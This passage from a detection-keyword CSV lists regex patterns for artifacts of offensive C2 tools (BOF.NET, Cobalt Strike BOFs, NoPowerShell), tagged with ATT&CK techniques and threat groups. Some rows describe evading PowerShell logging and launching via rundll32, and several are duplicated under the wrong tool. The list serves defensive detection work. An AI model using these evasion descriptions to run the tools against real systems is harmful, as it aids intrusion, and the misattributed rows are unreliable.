- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*BOFNET.sln*",".{0,1000}BOFNET\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_boo *.boo*",".{0,1000}bofnet_boo\s.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat 
Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_execute.cpp*",".{0,1000}bofnet_execute\.cpp.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. 
No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x64.obj*",".{0,1000}bofnet_execute\.cpp\.x64\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_execute.cpp.x86.obj*",".{0,1000}bofnet_execute\.cpp\.x86\.obj.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_init*",".{0,1000}bofnet_init.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_job *",".{0,1000}bofnet_job\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobkill*",".{0,1000}bofnet_jobkill.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobs*",".{0,1000}bofnet_jobs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_jobstatus *",".{0,1000}bofnet_jobstatus\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_list*",".{0,1000}bofnet_list.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_listassembiles*",".{0,1000}bofnet_listassembiles.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime 
for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_load *",".{0,1000}bofnet_load\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*bofnet_load *.*",".{0,1000}bofnet_load\s.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofnet_shutdown*",".{0,1000}bofnet_shutdown.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOFNET_Tests*",".{0,1000}BOFNET_Tests.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*bofportscan *",".{0,1000}bofportscan\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" 